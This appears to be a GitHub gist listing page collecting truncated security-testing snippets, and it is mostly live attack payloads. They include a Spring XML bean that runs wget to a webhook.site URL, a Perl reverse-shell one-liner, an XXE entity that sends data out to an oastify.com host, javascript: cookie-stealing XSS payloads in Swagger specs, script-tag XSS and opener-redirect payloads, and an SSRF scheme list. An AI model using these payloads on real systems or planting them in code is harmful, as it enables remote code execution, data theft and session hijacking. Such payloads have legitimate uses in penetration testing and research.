This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN" "http://www.springframework.org/dtd/spring-beans.dtd"> | |
<beans xmlns="http://www.springframework.org/schema/beans" | |
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | |
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> | |
<bean id="test" class="java.lang.ProcessBuilder"> | |
<constructor-arg type="java.lang.String" index="0"><value>wget</value></constructor-arg> | |
<constructor-arg type="java.lang.String" index="1"><value>https://webhook.site/08fc4b77-7e92-46c4-8f7a-fa3b76126698/123</value></constructor-arg> | |
<property name="whatever" value="#{test.start()}"/> | |
</bean> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
perl -e 'use Socket;$i="127.0.0.1";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#requires -version 2 | |
function New-InMemoryModule { | |
<# | |
.SYNOPSIS | |
Creates an in-memory assembly and module | |
Author: Matthew Graeber (@mattifestation) | |
License: BSD 3-Clause |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
swagger: "2.0", | |
info: | |
title: "Swagger Sample App", | |
description: "Please to click Terms of service" | |
termsOfService: "javascript:alert(document.cookie)" | |
contact: | |
name: "API Support", | |
url: "javascript:alert(document.cookie)", | |
email: "javascript:alert(document.cookie)" | |
version: "1.0.1" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.io.*; | |
public class JavaDeserial{ | |
public static void main(String args[]) throws Exception{ | |
FileInputStream fis = new FileInputStream("/tmp/normalObj.serial"); | |
ObjectInputStream ois = new ObjectInputStream(fis); | |
NormalObj unserObj = (NormalObj)ois.readObject(); | |
ois.close(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
acap | |
afp | |
dict | |
dns | |
file | |
ftp | |
git | |
gopher | |
http | |
https |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> opener.location="https://www.google.com"</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'http://fwfn5gywf26g6g92fpg6eoxdg4muaj.oastify.com/%data3;'>"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"apiVersion": "1.0", | |
"apis": [{ | |
"description": "Please to click Terms of service", | |
"termsOfServiceUrl": "javascript:alert(document.cookie)", | |
"path": "\/def\/", | |
"position": 0 | |
}], | |
"authorizations": {}, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script>alert(1)</script> |
NewerOlder